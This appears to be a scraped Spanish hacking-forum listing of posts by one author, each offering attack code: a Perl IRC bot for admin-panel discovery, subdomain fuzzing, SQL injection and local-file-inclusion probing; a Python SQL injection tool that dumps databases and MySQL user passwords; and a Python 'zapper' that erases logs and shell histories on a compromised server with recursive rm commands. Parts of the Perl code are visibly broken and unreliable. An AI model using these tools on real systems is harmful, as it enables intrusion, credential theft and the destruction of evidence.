|
391
|
Programación / Scripting / [Perl] Terr0r B0t By Doddy H
|
en: 7 Octubre 2011, 15:55 pm
|
Hola a todos. Hoy les traigo un programa que hice anoche , este es un bot irc ,el cual tiene las siguientes opciones : * Codificacion y decodificacion de base64 , hex , ascii * Buscar panel de administracion de algun sitio * Scan SQLI (busca numero de columnas y da info) * Tool para explotar LFI Comandos para el bot en el canal !base64 encode/decode string !hex encode/decode string !ascii encode/decode string !panel http://127.0.0.1 !sqli http://127.0.0.1/sql.php?id= !lfi http://127.0.0.1/lfi.php?file='
Forma de uso : C:/Users/DoddyH/Desktop/Arsenal X>terror-b0t.pl
[+] tERR0R b0T (c) dODDy HacKMaN 2010
[+] Starting the bot [+] Online
#!usr/bin/perl #Terr0r B0t (C) Doddy Hackman 2010 #Commands to use # #!base64 encode/decode string #!hex encode/decode string #!ascii encode/decode string #!panel http://127.0.0.1 #!sqli http://127.0.0.1/sql.php?id= #!lfi http://127.0.0.1/lfi.php?file=' # # use IO::Socket; use LWP::UserAgent; use HTTP::Request::Common; @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc'); @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/'); my $nave = LWP::UserAgent->new(); $nave->timeout(13); $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); print "\n[+] tERR0R b0T (c) dODDy HacKMaN 2010\n\n"; my $servidor = "127.0.0.1"; #Servidor IRC my $canal = "#locos"; #Canal IRC del servidor especificado my $nick = "Lepuke-Slave"; # Apodo del bot my $port = "6667"; # Puerto del servidor IRC print "[+] Starting the bot\n"; my $soquete = new IO::Socket::INET( PeerAddr =>$servidor, PeerPort => $port, Proto => 'tcp' ); if (!$soquete) { print "\n[-] No se puedo conectar en $servidor $port\n"; } print $soquete "NICK $nick\r\n"; print $soquete "USER $nick 1 1 1 1\r\n"; print $soquete "JOIN $canal\r\n"; while ( my $log = <$soquete> ) { if ($log =~ /^PING(.*)$/i){ print $soquete "PONG $1\r\n"; } if($log =~ m/:!panel (.*)$/g) { scan($1); print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n"; } if($log =~ m/:!sqli (.*)$/g) { print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n"; scan2($1); } if($log =~ m/:!fuzzdns (.*)$/g) { scan1($1); print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n"; } if($log =~ m/:!lfi (.*)$/g) { lfi($1); print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n"; } if($log =~ m/:!base64 (.*) (.*)$/g) { use MIME::Base64; my ($opcion,$aa) = ($1,$2); if ($opcion eq "encode") { print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Encode : ".encode_base64 ($aa)."\r\n"; } elsif ($opcion eq "decode") { print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Text : ".decode_base64 ($aa)."\r\n"; } else { print $soquete "PRIVMSG $canal : ??\r\n"; } } if($log =~ m/:!ascii (.*) (.*)$/) { my ($opcion,$aa) = ($1,$2); if ($opcion eq "encode") { print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Encode : ".ascii ($aa)."\r\n"; } elsif ($opcion eq "decode") { print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Text : ".ascii_de ($aa)."\r\n"; } else { print $soquete "PRIVMSG $canal : ???\r\n"; } } if($log =~ m/:!hex (.*) (.*)$/) { my ($opcion,$aa) = ($1,$2); if ($opcion eq "encode") { print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Encode : ".encode ($aa)."\r\n"; } elsif ($opcion eq "decode") { print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Text : ".decode ($aa)."\r\n"; } else { print $soquete "PRIVMSG $canal : ????\r\n"; } } } sub lfi { print $soquete "PRIVMSG $canal : [+] Target confirmed : $_[0]"."\r\n"; print $soquete "PRIVMSG $canal : [+] Status : [scanning]"."\r\n"; $code = toma($_[0]); if ($code=~/No such file or directory in <b>(.*)<\/b> on line/ig) { print $soquete "PRIVMSG $canal : [+] Vulnerable !"."\r\n"; print $soquete "PRIVMSG $canal : [*] Full path discloure detected : $1"."\r\n"; print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]"."\r\n"; for my $file(@buscar3) { $code1 = toma($_[0].$file); unless ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) { $ok = 1; print $soquete "PRIVMSG $canal : [File Found] : ".$_[0].$file."\r\n"; } } unless($ok == 1) { print $soquete "PRIVMSG $canal : [-] Dont found any file"."\r\n"; } } else { print $soquete "PRIVMSG $canal : [-] Page not vulnerable to LFI"."\r\n"; } } sub scan1 { print $soquete "PRIVMSG $canal : [*] Searching DNS to ".$_[0]."\r\n"; for my $path(@dns) { $code = tomax("http://".$path.".".$_[0]); if ($code->is_success) { print $soquete "PRIVMSG $canal : http://".$path.".".$_[0]."\r\n"; } } } sub scan { print $soquete "PRIVMSG $canal [*] Searching panels to ".$_[0]."\r\n"; for my $path(@panels) { $code = tomax($_[0]."/".$path); if ($code->is_success) { $ct = 1; print $soquete "PRIVMSG $canal [Link] : ".$_[0]."/".$path."\r\n"; } } if ($ct ne 1) { print $soquete "PRIVMSG $canal [-] Not found any path\r\n"; } } sub scan2 { my $rows = "0"; my $asc; my $page = $_[0]; ($pass1,$pass2) = &bypass($ARGV[1]); $inyection = $page."-1".$pass1."order".$pass1."by"."9999999999".$pass2; $code = toma($inyection); if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) { $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2); if ($code1=~/The used SELECT statements have a different number of columns/ig) { my $path = $1; $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")"; $total = "1"; for my $rows(2..52) { $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; $total.= ",".$rows; $injection = $page."-1".$pass1."union".$pass1."select".$pass1.$alert.$asc; $test = toma($injection); if ($test=~/RATSXPDOWN/) { @number = $test =~m{RATSXPDOWN (\d+)RATSXPDOWN }g ; print $soquete "PRIVMSG $canal : [Page] : $page\r\n"; print $soquete "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n"; print $soquete "PRIVMSG $canal : [Data] : The number @number print data\r\n"; if ($test=~/RATSXPDOWN(\d+)/) { if ($path) { print $soquete "PRIVMSG $canal : [Full Path Discloure] : $path\r\n"; } $total=~s/@number[0]/hackman /; print $soquete "PRIVMSG $canal : [+] Injection SQL : ".$page."-1".$pass1."union".$pass1."select".$pass1.$total."\r\n"; &details($page."-1".$pass1."union".$pass1."select".$pass1.$total,$_[1]); last; } } } } } sub details { my $page = $_[0]; ($pass1,$pass2) = &bypass($ARGV[1]); if ($page=~/(.*)hackman(.*)/ig) { my $start = $1; my $end = $2; $test1 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2); $test2 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2); $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); if ($test2=~/ERTOR854/ig) { print $soquete "PRIVMSG $canal : [+] Posibilidad de ver usuarios con mysql.user\r\n"; } if ($test1=~/ERTOR854/ig) { print $soquete "PRIVMSG $canal : [+] Se pueden ver todo con information_schema\r\n"; } if ($test3=~/ERTOR854/ig) { print $soquete "PRIVMSG $canal : [+] load_file permite ver los archivos\r\n"; } $code = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))".$end.$pass2); if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) { print $soquete "PRIVMSG $canal : [!] DB Version : $1\r\n"; print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n"; print $soquete "PRIVMSG $canal : [!] user_name : $3\r\n"; } else { print $soquete "PRIVMSG $canal : [-] Not found any data\r\n"; } print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n"; } } } sub bypass { if ($_[0] eq "/*") { return ("/**/","/*"); } elsif ($_[0] eq "%20") { return ("%20","%00"); } sub ascii { } sub ascii_de { } sub encode { my $string = $_[0]; $hex = '0x'; sub decode { $_[0] =~ s/^0x//; } sub toma { return $nave->request (GET $_[0])->content; } sub tomax { return $nave->request (GET $_[0]); } #The End
|
|
|
392
|
Programación / Scripting / [Python] SQL Scanner 0.3
|
en: 7 Octubre 2011, 01:40 am
|
Bueno este es un simple scanner en python que hice para SQLI Con las sig opciones : - Verifica vulnerabilidad
- Busca columnas
- Busca el numero milagroso y saca info sobre la DB
- Saca tablas y columnas de de la DB actual o otra externa
- Dumpear usuarios
- Guarda todo en un log con el nombre de la web en la carpeta /logs
#!usr/bin/python #SQL Scanner 0.3 (C) Doddy Hackman 2010 import os,sys,urllib2,re,binascii from urlparse import urlparse def clean(): if sys.platform=="win32": os.system("cls") else: os.system("clear") def savefile(name,text): file = open(name,"a") file.write("\n"+text+"\n") file.close() def gethost(test): return urlparse(test).netloc def header() : print "\n--== SQL Scanner ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" sys.exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : nave = urllib2.Request(web) nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5'); op = urllib2.build_opener() return op.open(nave).read() def bypass(bypass): if bypass == "--": return("+","--") elif bypass == "/*": return("/**/","/*") else: return("+","--") def dumper(web,passx,table,col1,col2): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web) code1 = toma(web1+pass1+"from"+pass1+table+pass2) print "\n\n[+] Searching values\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] Values Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): c1 = re.findall("K0BRA(.*?)K0BRA",code2) c1 = c1[0] c2 = re.findall("K0BRA1(.*?)K0BRA1",code2) c2 = c2[0] print "["+col1+"] : "+c1 print "["+col2+"] : "+c2+"\n" savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1) savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n") else: print "[-] Not Found\n" def mysqluser(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web) code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) print "\n\n[+] Searching mysql.user\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] mysql.user : ON" savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON") savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n") print "[+] Users Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): host = re.findall("K0BRA(.*?)K0BRA",code2) host = host[0] user = re.findall("K0BRA1(.*?)K0BRA1",code2) user = user[0] passw = re.findall("K0BRA2(.*?)K0BRA2",code2) passw = passw[0] savefile("logs/"+gethost(web)+".txt","[Host] : "+host) savefile("logs/"+gethost(web)+".txt","[User] : "+user) savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n") print "[Host] : "+host print "[User] : "+user print "[Pass] : "+passw+"\n" else: print "[-] Not Found\n" def showcolumnsdb(web,db,table,passx): db = "0x"+str(binascii.hexlify(db)) table = "0x"+str(binascii.hexlify(table)) pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching columns in DB\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] savefile("logs/"+gethost(web)+".txt","[DB] : "+db) savefile("logs/"+gethost(web)+".txt","[DB] : "+table) print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column) print "[Column Found] : "+column else: print "[-] Not Found\n" def showtablesdb(web,db,passx): db = "0x"+str(binascii.hexlify(db)) pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching tables in DB\n\n" savefile("logs/"+gethost(web)+".txt","[DB] : "+db) if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table) else: print "[-] Not Found\n" def showtables(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) print "\n\n[+] Searching tables\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(17,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table) else: print "[-] Not Found\n" def showcolumns(tabla,web,passx): pass1,pass2 = bypass(passx) tabla = "0x"+str(binascii.hexlify(tabla)) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2) print "\n\n[+] Searching tables\n\n" savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla) if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] print "[Column Found] : "+column savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column) else: print "[-] Not Found\n" def showdbs(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2) print "\n\n[+] Searching DBS\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] DBS Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): db = re.findall("K0BRA(.*?)K0BRA",code2) db = db[0] print "[DB Found] : "+db savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db) else: print "[-] Not Found\n" def menu(page,bypass): clean() header() print "\n[+] Target : ",page,"\n" print "\n[information_schema]\n\n" print "1 - Show tables\n" print "2 - Show columns of the a table\n" print "3 - Show databases\n" print "4 - Show tables from the a DB\n" print "5 - Show columns from the a table of the DB\n" print "\n[mysql.user]\n\n" print "6 - Show users\n" print "\n[Others]\n\n" print "7 - Show details\n" print "8 - Dump data\n" print "9 - Show log\n" print "10 - Change target\n" print "11 - Exit\n\n" try: op = input("[Option] : ") if op == 1: showtables(page,bypass) raw_input() menu(page,bypass) elif op == 2: table = raw_input("\n\n[Table] : ") showcolumns(table,page,bypass) raw_input() menu(page,bypass) elif op == 3: showdbs(page,bypass) raw_input() menu(page,bypass) elif op == 4: db = raw_input("\n\n[DB] : ") showtablesdb(page,db,bypass) raw_input() menu(page,bypass) elif op == 5: db = raw_input("\n\n[DB] : ") table = raw_input("\n\n[Table] : ") showcolumnsdb(page,db,table,bypass) raw_input() menu(page,bypass) elif op == 6: mysqluser(page,bypass) raw_input() menu(page,bypass) elif op == 7: more(page,bypass) raw_input() menu(page,bypass) elif op == 8: table = raw_input("\n\n[Table] : ") col1 = raw_input("\n\n[Column 1] : ") col2 = raw_input("\n\n[Column 2] : ") dumper(page,bypass,table,col1,col2) raw_input() menu(page,bypass) elif op == 9: os.system("start logs/"+gethost(page)+".txt") menu(page,bypass) elif op == 10: sta() except: menu(page,bypass) if op == 11: copyright() def more(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Searching more data\n" web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web) code0 = toma(web1+pass2) if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)): datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0) datar = re.split("K0BRA",datax[0]) print "[+] Username :",datar[1] print "[+] Database :",datar[2] print "[+] Version :",datar[3],"\n" savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1]) savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2]) savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n") code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) if (re.findall("K0BRA",code1)): print "[+] mysql.user : on" savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on") code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) if (re.findall("K0BRA",code2)): print "[+] information_schema.tables : on" savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on") def findlength(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Finding columns length" number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))" for te in range(2,30): number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))" code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2) if (re.findall("K0BRA(.*?)K0BRA",code)): numbers = re.findall("K0BRA(.*?)K0BRA",code) print "[+] Column length :",te print "[+] Numbers",numbers,"print data" sql = "" tex = te + 1 for sqlix in range(2,tex): sql = str(sql)+","+str(sqlix) sqli = str(1)+sql sqla = re.sub(numbers[0],"hackman",sqli) savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla) menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx) print "[-] Length dont found\n" def scan(web,passx): pass1,pass2 = bypass(passx) print "\n\n[+] Testing vulnerability" code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2) if (re.findall("The used SELECT statements have a different number of columns",code,re.I)): print "[+] SQLI Detected" findlength(web,passx) else: print "[-] Not Vulnerable" copyright() def sta(): clean() header() web = raw_input("\n\n[Page] : ") bypasx = raw_input("\n\n[Bypass] : ") scan(web,bypasx) sta() #The End
|
|
|
393
|
Programación / Scripting / [Python] Zapper By Doddy H
|
en: 7 Octubre 2011, 01:39 am
|
Hola a todos. Acabo de hacer un simple zapper en python , tan solo lo cargan en el sistema web atacado y comienza a borrar huellas. Eso si , no me habia dado cuenta de que facil usar python xDD #!usr/bin/python #Zapper (C) Doddy Hackman import os paths = ["/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm", "/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog", "/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access","/var/log/qmail", "/var/log/smtpd", "/var/log/samba", "/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all", "/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"] comandos = ['find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST'] print "\n[+] Starting the zapper" for path in paths : try : os.delete(path) except : pass for cmd in comandos : try: os.system(cmd) except: pass print "[+] All logs are erased\n" #The End ?
|
|
|
394
|
Programación / Scripting / [Python] RFI Tester
|
en: 7 Octubre 2011, 01:39 am
|
